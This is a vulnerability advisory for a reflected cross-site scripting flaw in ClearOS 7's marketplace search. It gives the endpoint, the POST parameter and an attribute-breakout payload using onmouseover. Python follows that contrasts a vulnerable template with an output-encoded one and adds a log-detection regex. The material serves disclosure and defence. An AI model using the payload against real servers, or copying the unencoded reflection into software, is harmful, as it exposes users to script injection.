ClearOS 7 Community Edition suffers from a cross site scripting vulnerability.
32b6322d24448d2348621b162c00e749
##################################################################################################################################
# Exploit Title: ClearOS 7 Community Edition | Cross-Site Scripting
# Date: 06.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.clearos.com
# Software Link: http://mirror.clearos.com/clearos/7/iso/x86_64/ClearOS-DVD-x86_64.iso
# Version: 7
##################################################################################################################################
Introduction
ClearOS is a small business server operating system with server,
networking, and gateway functions. It is designed primarily for home,
small, medium, and distributed environments. It is managed from a web-based
user interface, but can also be completely managed and tuned from the
command line. ClearOS is available in a free Community Edition, which
includes the open source updates and patches available from its upstream
sources. ClearOS is also offered in a Home and Business Edition, which
receives additional testing of updates and only ships tested code.
Professional tech support is also available. Currently ClearOS offers
100+ features, which can be installed through the onboard ClearOS Marketplace.
#################################################################################
XSS details
#################################################################################
XSS1 | Reflected
URL: https://192.168.2.104:81/app/marketplace/search
METHOD: POST
PARAMETER: search
PAYLOAD: ' onmouseover=alert(1) '
#################################################################################
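The payload above works because the search term is reflected inside a single-quoted HTML attribute: the leading quote closes the attribute and the rest is parsed as a new event-handler attribute. The following is an added example, not ClearOS code, that models that attribute-context reflection with a hypothetical template, shows the hardened form using context-aware output encoding, and includes a heuristic a defender could run over request logs to flag attribute-breakout attempts against the `search` parameter. The template functions and the attribute tokenizer are assumptions for illustration; the payload string is the one in the advisory.

```python
import html
import re

# Payload from the advisory: closes a single-quoted attribute value and
# appends an event handler attribute.
PAYLOAD = "' onmouseover=alert(1) '"


def render_search_box_unsafe(search_term: str) -> str:
    """Hypothetical vulnerable template: reflects the submitted search term
    into a single-quoted value attribute with no encoding."""
    return f"<input type='text' name='search' value='{search_term}'>"


def render_search_box_safe(search_term: str) -> str:
    """Hardened form: html.escape(quote=True) encodes & < > " and ' so the
    reflected value can never terminate the attribute it lives in."""
    encoded = html.escape(search_term, quote=True)
    return f"<input type='text' name='search' value='{encoded}'>"


# Minimal attribute tokenizer used only to show what an HTML parser would see:
# a name preceded by whitespace, optionally followed by a quoted or bare value.
_ATTR_RE = re.compile(r"""\s([a-zA-Z-]+)(?:=(?:'[^']*'|"[^"]*"|[^\s>]+))?""")


def attribute_names(tag_markup: str) -> list[str]:
    """Return the attribute names present on a single-tag markup string."""
    return [m.group(1).lower() for m in _ATTR_RE.finditer(tag_markup)]


def has_event_handler(tag_markup: str) -> bool:
    """True if any attribute on the tag is an on* event handler."""
    return any(name.startswith("on") for name in attribute_names(tag_markup))


# Detection heuristic for log triage (assumption, not a ClearOS feature):
# a quote character followed later by an on<event>= token is the signature
# of an attribute-breakout attempt. It is intentionally broad and will
# produce some false positives on ordinary text.
_BREAKOUT_RE = re.compile(r"""['"][^'"]*\bon[a-z]+\s*=""", re.IGNORECASE)


def looks_like_attribute_breakout(search_term: str) -> bool:
    return _BREAKOUT_RE.search(search_term) is not None


if __name__ == "__main__":
    unsafe = render_search_box_unsafe(PAYLOAD)
    safe = render_search_box_safe(PAYLOAD)
    print("unsafe :", unsafe, "->", attribute_names(unsafe))
    print("safe   :", safe, "->", attribute_names(safe))
    print("flagged:", looks_like_attribute_breakout(PAYLOAD))
```

With the unsafe template the parser sees four attributes, including `onmouseover`; with the encoded version it sees only `type`, `name` and `value`. Output encoding must match the context (attribute, element body, URL, JavaScript), which is why a generic "strip tags" filter would not have prevented this particular reflection.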